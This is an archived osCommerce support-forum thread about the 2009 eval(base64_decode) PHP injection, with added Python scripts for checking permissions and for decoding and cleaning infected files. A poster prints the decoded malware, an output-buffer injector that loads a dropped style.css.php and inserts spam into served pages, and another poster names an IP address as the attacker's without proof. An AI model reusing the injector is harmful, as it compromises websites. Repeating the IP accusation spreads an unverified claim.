FIMBLE Posted October 1, 2009

eval(base64_decode hack going around the internet

If your cart "suddenly" stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack. Some of the more common signs of this are:

* Category images stop displaying
* FCK editor refuses to display images folder
* Payment modules stop working
* Checkout process stops working

How will you know? Open any PHP file on your server, if at the very top you see a line like

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)

Then you have been hacked.

To clean your site you have two options,

1, delete the entire set of PHP files on your server (this hack will infect every single PHP file regardless of where it belongs, i.e. non-osC files will also be infected) and restore from a good back up. This is the best and easy route.

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level. To do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

This will reveal the location of the files you have to remove, note that it could be from 1 file to up to 30, and in some cases they will overwrite the files that should be in the host folder. Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or it's going to take you a very long time!

When this has been done it will be good practice to "drop" your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I've not come across this yet, but have heard it happens.

Now your site is free of the code, you need to prevent it from happening again.
How to prevent infection. This is not guaranteed 100% proof but it is going to help stop re-infection.

* Change the name of your admin folder to something less obvious.
* Delete admin/filemanager.php and associated links.
* Ensure that your folder permissions are never set higher than 755.
* Install some security addons. Also some ideas from this post can help you.

If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when. There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can, there are a lot of great people posting good information here.

Sometimes you're the dog and sometimes the lamp post
pinklep Posted October 1, 2009

(quoting FIMBLE's opening post above in full)

Thank you very much for the information. I found a file called NuSoup.php that I don't recognize. Could this be a file used for hacking?

I am a Jedi, like my father before me!
♥ecartz Posted October 1, 2009

Quoting FIMBLE: "Ensure that your folder permissions are never set higher than 755"

It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories. A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.

Always back up before making changes.
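An added check (not code from the thread) for ecartz's point that ownership matters as much as the mode bits: the owner-write bit is treated as live only when the web server account owns the entry, so a 755 directory owned by the web user is reported while the same directory owned by another account is not. It assumes you pass the uid/gid the web server runs as; the walk helper only reports and changes nothing.

```python
"""Report files and directories the web server account could modify."""
import os
import stat


def web_can_write(st_uid, st_gid, st_mode, web_uid, web_gid):
    """True if an account running as web_uid/web_gid may write an entry with these stat fields.

    The point from the thread: 0755 on a directory the web user owns is as open to
    that user as 0777, so the owner bits only protect you when the owner is someone else.
    """
    if st_uid == web_uid and st_mode & stat.S_IWUSR:
        return True
    if st_gid == web_gid and st_mode & stat.S_IWGRP:
        return True
    return bool(st_mode & stat.S_IWOTH)


def mode_string(st_mode):
    """Octal permission bits only (e.g. '0o444'), without the file-type bits."""
    return oct(stat.S_IMODE(st_mode))


def find_web_writable(root, web_uid, web_gid):
    """Return {path: octal mode} for every entry under root the web account could modify."""
    hits = {}
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own bits mean nothing; its target is checked in its own place
            if web_can_write(st.st_uid, st.st_gid, st.st_mode, web_uid, web_gid):
                hits[path] = mode_string(st.st_mode)
    return hits


if __name__ == "__main__":
    # Constructed uid/gid values; on a real host take them from the httpd worker processes.
    WEB_UID, WEB_GID = 1001, 1001
    for path, mode in sorted(find_web_writable(".", WEB_UID, WEB_GID).items()):
        print(mode, path)
```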
jonatanvalencia Posted October 2, 2009

Damn, I am hacked, I saw that line a month ago and I thought it was strange but it did not catch enough of my attention. Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body html code and I said it was impossible. I hope to clean up my whole sites. Regards
PapaJohnL Posted October 2, 2009

FYI on this hack... I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get into php files. So, it would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker? For what it's worth, in case any of you have a forum, he is registering under the name [email protected]
Guest Posted October 2, 2009

(quoting PapaJohnL's post above in full)

My list of banned IPs continues to grow.
germ Posted October 3, 2009

Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle... :huh: Like vultures to a rotting carcass... :o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Jet200 Posted October 3, 2009

Question on the database restore part... will I lose any info that I've acquired from infection (9/22) until now?
FIMBLE Posted October 3, 2009 (Author)

Quoting Jet200: "question on the database restore part... will i lose any info that i've acquired from infection (9/22) until now?"

Yes you will, restoring will take your database and all information contained within back to the restore date.

Nic
FIMBLE Posted October 3, 2009 (Author)

Quoting pinklep: "Thank you very much for the information. I found a file called NuSoup.php that I dont recognize. Could this be a file used for hacking?"

There is a nusoap.php, is that what you mean?

Nic
birdmantx Posted October 4, 2009

I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious. I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed? What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked. Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

Flying away to get back to work.
FIMBLE Posted October 4, 2009 (Author)

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery. You really need to decode the line to find the place that the files are located in. There can be a lot of files or one or two, and called different names. style.css.php is one, dg.php another, there are .swf files also.

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end

Nic
geode vibrations Posted October 4, 2009

Quoting FIMBLE: "To clean your site you have two options, 1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected) And restore from a good back up. This is the best and easy route."

Hello, can you help? Followed advice and I was infected. Have been through all files and removed all php from server. I assume that restore is done from oscommerce admin. When I go to access this I have deleted shop/admin/login.php and so can't access it to reload. I know my product information is still there in files, pics etc. How can I get the missing php so I can restore?
FIMBLE Posted October 4, 2009 (Author)

Hi, you can use one from back up, or you can download a fresh copy of your osCommerce version and upload the file from that.

Nic
birdmantx Posted October 4, 2009

Hello, I have tried so many ways to use the decoder you recommend, with no luck. Here is the code:

[the eval(base64_decode('...')) line from the top of index.php, and the start of the file that follows it, omitted]
FIMBLE Posted October 4, 2009 (Author)

here it is '/catalog/includes/languages/english/modules/shipping/style.css.php

For anyone else having problems you need to strip the tags and apostrophes so it looks like the base64 string on its own.

Nic
birdmantx Posted October 4, 2009

Quoting FIMBLE: "here it is '/catalog/includes/languages/english/modules/shipping/style.css.php"

Nic, so besides cleaning or replacing each php file, is that the only file that needs to be removed?
FIMBLE Posted October 4, 2009 (Author)

You need to compare the folder contents with either your back up or another trusted source, as I've said a few times here there can be many new files added. You will be better off deleting the folder and uploading a good one.

Nic
birdmantx Posted October 5, 2009

Nic found 35 hidden files in my site that didn't belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now. I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running. Funny I am sleeping when most of you are awake and vice versa. Best wishes! Sam- in Texas
fijiislander Posted October 5, 2009

Joining the club - Hacked - and my team lost again today. I can confirm that any php file, even simple redirects in subdomains, will get nailed. Incidentally I had 755 as the minimum, but now I know better. Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla? Obviously the authors "like" OsCommerce.
fijiislander Posted October 5, 2009

Quoting fijiislander: "Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?"

After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases.
FIMBLE Posted October 5, 2009 (Author)

Quoting fijiislander: "After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases."

Permissions are not the determining factor for this attack, it's the presence of the admin folder still called admin, and the filemanager.php. Once in it will spread to any PHP file, platform / package independent, adding its code as it goes. I can imagine in a lot of cases there will be many more php files than osC ones.
birdmantx Posted October 5, 2009

Question. I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?
FIMBLE Posted October 5, 2009 (Author)

Well it's the two million dollar question! Was it or not? Nothing proven, and nothing admitted. Not sure we will ever know that.

Nic
Guest Posted October 5, 2009

I was able to decode mine and found out that the file was added to a wordpress blog that I have on another domain that is hosted within my oscommerce store account. I decided to delete the whole blog from the server. I still have a question about the code, which I have pasted below already decoded... As you see, there is still a lot of it not decoded, followed by a "gzdecode". How can I decode that?

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
$GLOBALS['sh_no']=1;
if(file_exists('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){
include_once('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
if(function_exists('gml')&&!function_exists('dgobh')){
if(!function_exists('gzdecode')){
function gzdecode($R20FD65E9C7406034FADC682F06732868){
$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
$R60169CD1C47B7A7A85AB44F884635E41=10;
$R0D54236DA20594EC13FC81B209733931=0;
if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}
if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}
$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}
return $RC4A5B5E310ED4C323E04D72AFAE39F53;
}}
function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
Header('Content-Encoding: none');
$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}
else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}
}
ob_start('dgobh');
}}}
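An added example, not code from the thread, that does FIMBLE's decoder step for a whole tree in one pass: it decodes the injected top line, lists the files the payload tests for and includes (the dropped style.css.php), records the ob_start callback it registers, and strips the line; the sample file and its paths are constructed.

```python
"""Find, decode and strip the eval(base64_decode(...)) line prepended to PHP files."""
import base64
import os
import re

# The prepended one-liner: <?php /**/eval(base64_decode('...')); ?>
INJECT_RE = re.compile(
    r"^\s*<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>"
)
# Files the decoded payload probes or pulls in (the dropped loader and friends)
PATH_RE = re.compile(
    r"(?:file_exists|include_once|require_once|include|require)\('([^']+)'\)"
)
# Output-buffer callback the payload registers so it can rewrite every served page
OB_RE = re.compile(r"ob_start\('(\w+)'\)")


def analyse_php(source):
    """Decode one file's injected line; return what a defender needs from it."""
    m = INJECT_RE.match(source)
    if not m:
        return {"infected": False, "paths": [], "callback": None, "cleaned": source}
    decoded = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    paths = []
    for p in PATH_RE.findall(decoded):
        if p not in paths:
            paths.append(p)
    cb = OB_RE.search(decoded)
    return {
        "infected": True,
        "paths": paths,  # dropped files to delete, then compare the folder with a clean backup
        "callback": cb.group(1) if cb else None,
        "cleaned": source[m.end():].lstrip(),  # the original file without the injected line
    }


def scan_tree(root, fix=False):
    """Walk every .php file under root; report infected ones and, if fix=True, rewrite them."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = analyse_php(fh.read())
            if result["infected"]:
                report[path] = result["paths"]
                if fix:  # only after you have a backup, as the thread says
                    with open(path, "w", encoding="utf-8") as fh:
                        fh.write(result["cleaned"])
    return report


# Constructed sample (not a real infection): same shape as the decoded payload in the thread.
_PAYLOAD = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
    "if(file_exists('/home/example/public_html/catalog/includes/languages/english/"
    "modules/shipping/style.css.php')){include_once('/home/example/public_html/catalog/"
    "includes/languages/english/modules/shipping/style.css.php');ob_start('dgobh');}}"
)
SAMPLE_INFECTED = (
    "<?php /**/eval(base64_decode('"
    + base64.b64encode(_PAYLOAD.encode()).decode()
    + "')); ?> <?php\n/*\n  $Id: index.php (constructed stub)\n*/\n"
    "require('includes/application_top.php');\n"
)

if __name__ == "__main__":
    r = analyse_php(SAMPLE_INFECTED)
    print("infected:", r["infected"], "callback:", r["callback"])
    for p in r["paths"]:
        print("dropped file referenced:", p)
```

The decoded text in the post above needs no further decoding: its gzdecode function exists only to decompress the buffered page so the dgobh callback can insert gml() output after <body>.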
This topic is now archived and is closed to further replies.